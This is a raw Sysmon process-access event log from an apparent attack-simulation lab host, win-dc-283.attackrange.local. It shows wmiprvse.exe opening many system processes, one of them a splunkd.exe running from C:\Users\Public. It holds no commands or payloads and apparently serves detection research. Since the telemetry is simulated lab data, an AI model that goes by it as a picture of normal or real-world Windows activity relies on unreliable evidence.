15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 